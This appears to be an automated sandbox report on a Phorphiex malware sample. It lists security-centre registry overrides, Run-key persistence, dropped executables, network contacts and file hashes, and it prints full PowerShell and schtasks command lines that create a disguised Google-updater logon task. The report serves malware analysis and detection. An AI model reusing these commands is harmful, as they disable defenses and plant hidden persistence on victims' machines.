Analysis Overview
SHA256
22f524abc98f958705febd3761bedc85ec1ae859316a653b67c0c01327533092
Threat Level: Known bad
The file tmp was found to be: Known bad.
Malicious Activity Summary
Phorphiex family
Phorphiex
Windows security bypass
Executes dropped EXE
Downloads MZ/PE file
Loads dropped DLL
Windows security modification
Checks computer location settings
Adds Run key to start application
Drops file in System32 directory
Drops file in Windows directory
Enumerates physical storage devices
Creates scheduled task(s)
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-09-28 09:38
Signatures
Phorphiex family
Analysis: behavioral1
Detonation Overview
Submitted
2022-09-28 09:38
Reported
2022-09-28 09:41
Platform
win7-20220901-en
Max time kernel
150s
Max time network
152s
Command Line
Signatures
Phorphiex
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\sysrdsvms.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\sysrdsvms.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\sysrdsvms.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\sysrdsvms.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\sysrdsvms.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\sysrdsvms.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\winrecsv.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\winrecsv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1546029693.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\267013931.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2720910907.exe | N/A |
| N/A | N/A | C:\Windows\sysrdsvms.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1176812100.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\394619085.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\734023711.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\winrecsv.exe | N/A |
| N/A | N/A | C:\Windows\winrecsv.exe | N/A |
| N/A | N/A | C:\Windows\winrecsv.exe | N/A |
| N/A | N/A | C:\Windows\winrecsv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\267013931.exe | N/A |
| N/A | N/A | C:\Windows\sysrdsvms.exe | N/A |
| N/A | N/A | C:\Windows\sysrdsvms.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskeng.exe | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" | C:\Windows\sysrdsvms.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\sysrdsvms.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\sysrdsvms.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\sysrdsvms.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\sysrdsvms.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\sysrdsvms.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\winrecsv.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\sysrdsvms.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\winrecsv.exe" | C:\Users\Admin\AppData\Local\Temp\tmp.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysrdsvms.exe" | C:\Users\Admin\AppData\Local\Temp\2720910907.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\winrecsv.exe | C:\Users\Admin\AppData\Local\Temp\tmp.exe | N/A |
| File opened for modification | C:\Windows\winrecsv.exe | C:\Users\Admin\AppData\Local\Temp\tmp.exe | N/A |
| File created | C:\Windows\sysrdsvms.exe | C:\Users\Admin\AppData\Local\Temp\2720910907.exe | N/A |
| File opened for modification | C:\Windows\sysrdsvms.exe | C:\Users\Admin\AppData\Local\Temp\2720910907.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1546029693.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\394619085.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1546029693.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\394619085.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp.exe"
C:\Windows\winrecsv.exe
C:\Windows\winrecsv.exe
C:\Users\Admin\AppData\Local\Temp\1546029693.exe
C:\Users\Admin\AppData\Local\Temp\1546029693.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "User Configuration"
C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f
C:\Windows\system32\schtasks.exe
schtasks /delete /f /tn "User Configuration"
C:\Users\Admin\AppData\Local\Temp\267013931.exe
C:\Users\Admin\AppData\Local\Temp\267013931.exe
C:\Users\Admin\AppData\Local\Temp\2720910907.exe
C:\Users\Admin\AppData\Local\Temp\2720910907.exe
C:\Windows\sysrdsvms.exe
C:\Windows\sysrdsvms.exe
C:\Users\Admin\AppData\Local\Temp\1176812100.exe
C:\Users\Admin\AppData\Local\Temp\1176812100.exe
C:\Users\Admin\AppData\Local\Temp\394619085.exe
C:\Users\Admin\AppData\Local\Temp\394619085.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "User Configuration"
C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f
C:\Windows\system32\schtasks.exe
schtasks /delete /f /tn "User Configuration"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#lipfordu#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTaskMachineQC /tr 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#oqazi#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe" }
C:\Users\Admin\AppData\Local\Temp\734023711.exe
C:\Users\Admin\AppData\Local\Temp\734023711.exe
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
C:\Windows\system32\taskeng.exe
taskeng.exe {4FCE7D72-71EF-4E8D-933B-3745F908F74E} S-1-5-21-4063495947-34355257-727531523-1000:RYNKSFQE\Admin:Interactive:[1]
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#lipfordu#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#lipfordu#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTaskMachineQC /tr 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTaskMachineQC /tr 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'
C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Users\Admin\AppData\Roaming\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Users\Admin\AppData\Roaming\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name, VideoProcessor
Network
| Country | Destination | Domain | Proto |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| US | 8.8.8.8:53 | www.update.microsoft.com | udp |
| US | 20.109.209.108:80 | www.update.microsoft.com | tcp |
| UZ | 94.141.68.136:40500 | udp | |
| IR | 2.184.54.70:40500 | tcp | |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| IN | 14.139.242.251:40500 | udp | |
| HK | 74.119.193.54:40500 | udp | |
| IR | 188.211.85.37:40500 | udp | |
| IR | 89.219.213.197:40500 | udp | |
| IR | 80.210.24.47:40500 | udp | |
| UZ | 185.4.160.252:40500 | tcp | |
| YE | 5.255.14.166:40500 | udp | |
| AM | 94.228.28.169:40500 | udp | |
| KZ | 88.204.242.226:40500 | udp | |
| KZ | 92.47.122.155:40500 | udp | |
| UZ | 213.230.127.60:40500 | udp | |
| IR | 2.185.153.12:40500 | tcp | |
| IR | 151.242.43.249:40500 | udp | |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| IR | 2.180.243.38:40500 | udp | |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| US | 8.8.8.8:53 | www.update.microsoft.com | udp |
| US | 20.109.209.108:80 | www.update.microsoft.com | tcp |
| UZ | 87.237.234.222:40500 | udp | |
| IN | 117.247.17.27:40500 | tcp | |
| RU | 109.191.166.61:40500 | udp | |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| N/A | 100.115.152.96:40500 | udp |
Files
memory/1760-54-0x0000000074DA1000-0x0000000074DA3000-memory.dmp
memory/1220-55-0x0000000000000000-mapping.dmp
C:\Windows\winrecsv.exe
| MD5 | ed2d7b25bb360cccb4f0f6a4f8732d7a |
| SHA1 | 6ffcc083956c5ac19826bdd87e12f87817ee837c |
| SHA256 | 22f524abc98f958705febd3761bedc85ec1ae859316a653b67c0c01327533092 |
| SHA512 | 6592ec1a12f9575176474c6192d49f4f4a87998da6692e07e8ba6a93789d6a92e41dbabd3488a27a49ec8c8c414e02751867feb2a0038e4091630ca3e4fb235f |
C:\Windows\winrecsv.exe
| MD5 | ed2d7b25bb360cccb4f0f6a4f8732d7a |
| SHA1 | 6ffcc083956c5ac19826bdd87e12f87817ee837c |
| SHA256 | 22f524abc98f958705febd3761bedc85ec1ae859316a653b67c0c01327533092 |
| SHA512 | 6592ec1a12f9575176474c6192d49f4f4a87998da6692e07e8ba6a93789d6a92e41dbabd3488a27a49ec8c8c414e02751867feb2a0038e4091630ca3e4fb235f |
memory/1344-60-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\1546029693.exe
| MD5 | 66bbb99fb92a3688d31a899992f73cdf |
| SHA1 | 836fad08d9de8ea28c35d1885496af8e1284a6e7 |
| SHA256 | 1d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6 |
| SHA512 | 6a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36 |
\Users\Admin\AppData\Local\Temp\1546029693.exe
| MD5 | 66bbb99fb92a3688d31a899992f73cdf |
| SHA1 | 836fad08d9de8ea28c35d1885496af8e1284a6e7 |
| SHA256 | 1d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6 |
| SHA512 | 6a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36 |
C:\Users\Admin\AppData\Local\Temp\1546029693.exe
| MD5 | 66bbb99fb92a3688d31a899992f73cdf |
| SHA1 | 836fad08d9de8ea28c35d1885496af8e1284a6e7 |
| SHA256 | 1d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6 |
| SHA512 | 6a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36 |
memory/1344-63-0x000000013F920000-0x000000013F926000-memory.dmp
memory/1344-64-0x000007FEFB651000-0x000007FEFB653000-memory.dmp
memory/1912-65-0x0000000000000000-mapping.dmp
memory/1052-66-0x0000000000000000-mapping.dmp
memory/968-68-0x0000000000000000-mapping.dmp
memory/1532-67-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\267013931.exe
| MD5 | f99a026691957a1490c606890021a4db |
| SHA1 | 4eca65b16ce9b8284f3fc54344f8ae15b406b4e1 |
| SHA256 | db23276681cfb7d843bfc35b96e40dcb77b3bafcb87aa211d3fa6910da6937bd |
| SHA512 | e4d9f869e4c12667a91af5792213350b9205a6fd3a2175e3af39571f2066ffa6a4b398a010497f428310b91033b4d5555835ede6669793f5cfd79ae47321421f |
memory/2024-70-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\267013931.exe
| MD5 | f99a026691957a1490c606890021a4db |
| SHA1 | 4eca65b16ce9b8284f3fc54344f8ae15b406b4e1 |
| SHA256 | db23276681cfb7d843bfc35b96e40dcb77b3bafcb87aa211d3fa6910da6937bd |
| SHA512 | e4d9f869e4c12667a91af5792213350b9205a6fd3a2175e3af39571f2066ffa6a4b398a010497f428310b91033b4d5555835ede6669793f5cfd79ae47321421f |
\Users\Admin\AppData\Local\Temp\2720910907.exe
| MD5 | 3d1212389bfcdc91be084e6c093a32a1 |
| SHA1 | 4f26c5cd52f148af9e40da1daf916e7e86620db9 |
| SHA256 | 93d7749054f314b948a99012fd930ea8a0c4124a72d98746bd21fcd17eb7219c |
| SHA512 | b78fa0526f1b5ecf94faf713999e26c7f345bccd85cc1597b7425ceeaf2467c8a4356667d1e6adceb7e7d5aeb90e10df83319fa4e682ee7a5c8471e12e953361 |
\Users\Admin\AppData\Local\Temp\2720910907.exe
| MD5 | 3d1212389bfcdc91be084e6c093a32a1 |
| SHA1 | 4f26c5cd52f148af9e40da1daf916e7e86620db9 |
| SHA256 | 93d7749054f314b948a99012fd930ea8a0c4124a72d98746bd21fcd17eb7219c |
| SHA512 | b78fa0526f1b5ecf94faf713999e26c7f345bccd85cc1597b7425ceeaf2467c8a4356667d1e6adceb7e7d5aeb90e10df83319fa4e682ee7a5c8471e12e953361 |
memory/1228-75-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\2720910907.exe
| MD5 | 3d1212389bfcdc91be084e6c093a32a1 |
| SHA1 | 4f26c5cd52f148af9e40da1daf916e7e86620db9 |
| SHA256 | 93d7749054f314b948a99012fd930ea8a0c4124a72d98746bd21fcd17eb7219c |
| SHA512 | b78fa0526f1b5ecf94faf713999e26c7f345bccd85cc1597b7425ceeaf2467c8a4356667d1e6adceb7e7d5aeb90e10df83319fa4e682ee7a5c8471e12e953361 |
C:\Users\Admin\AppData\Local\Temp\2720910907.exe
| MD5 | 3d1212389bfcdc91be084e6c093a32a1 |
| SHA1 | 4f26c5cd52f148af9e40da1daf916e7e86620db9 |
| SHA256 | 93d7749054f314b948a99012fd930ea8a0c4124a72d98746bd21fcd17eb7219c |
| SHA512 | b78fa0526f1b5ecf94faf713999e26c7f345bccd85cc1597b7425ceeaf2467c8a4356667d1e6adceb7e7d5aeb90e10df83319fa4e682ee7a5c8471e12e953361 |
memory/944-79-0x0000000000000000-mapping.dmp
C:\Windows\sysrdsvms.exe
| MD5 | 3d1212389bfcdc91be084e6c093a32a1 |
| SHA1 | 4f26c5cd52f148af9e40da1daf916e7e86620db9 |
| SHA256 | 93d7749054f314b948a99012fd930ea8a0c4124a72d98746bd21fcd17eb7219c |
| SHA512 | b78fa0526f1b5ecf94faf713999e26c7f345bccd85cc1597b7425ceeaf2467c8a4356667d1e6adceb7e7d5aeb90e10df83319fa4e682ee7a5c8471e12e953361 |
C:\Windows\sysrdsvms.exe
| MD5 | 3d1212389bfcdc91be084e6c093a32a1 |
| SHA1 | 4f26c5cd52f148af9e40da1daf916e7e86620db9 |
| SHA256 | 93d7749054f314b948a99012fd930ea8a0c4124a72d98746bd21fcd17eb7219c |
| SHA512 | b78fa0526f1b5ecf94faf713999e26c7f345bccd85cc1597b7425ceeaf2467c8a4356667d1e6adceb7e7d5aeb90e10df83319fa4e682ee7a5c8471e12e953361 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z4TAQ562\1[1]
| MD5 | 1f1b20c870a2dc3f79ee75bbedf9d04b |
